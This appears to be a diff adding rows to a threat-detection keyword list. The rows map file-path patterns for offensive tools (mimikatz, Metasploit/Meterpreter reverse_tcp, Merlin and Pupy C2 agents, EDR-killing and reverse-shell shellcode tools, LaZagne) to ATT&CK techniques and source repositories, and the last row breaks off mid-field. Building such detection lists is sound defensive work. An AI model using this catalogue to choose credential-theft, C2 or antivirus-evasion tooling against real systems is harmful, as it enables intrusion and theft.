+"*/maxdb-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mcafee-epo-agent.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/megatools.exe*","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*/membase-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/membase-http-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/memcached-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/memodipper64*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/memory_exec.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/memorydump.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*/mempodipper.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/MemReader_BoF/*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" +"*/merlin.dll*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*/merlin.html*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*/merlin.js*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*/merlin.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*/merlin/agent_code/*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*/met_inject.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/Metasploit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/metasploit/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/metasploit-framework/embedded/framework*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/metasploit-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/metasploit-msgrpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/metasploit-xmlrpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/metatwin.git*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" +"*/meterpreter*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/meterpreter/reverse_tcp*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*/MFASweep.git*","offensive_tool_keyword","FMFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1033","152","2023-07-25T05:10:55Z","2020-09-22T16:25:03Z" +"*/mhydeath.git*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*/mhydeath.sln*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*/mhydeath/main.cpp*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*/michaelweber/Macrome*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*/micr0%20shell.py*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" +"*/micr0_shell.git*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" +"*/MicroBurst.git*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*/mikrotik-routeros-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mimi32.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimi64.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimicom.idl*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimidrv.sys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimidrv.zip*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimikatz.enc*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" +"*/mimikatz.sln*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimikatz_bypass/mimikatz.py*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimikatz_bypass/mimikatz2.py*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimikatz_bypassAV/main.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimikatz_bypassAV/mimikatz_load.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimikatz_load.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimilib.def*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimilove.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimilove.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimilove.rc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimipenguin.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/mimipenguin.c*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - 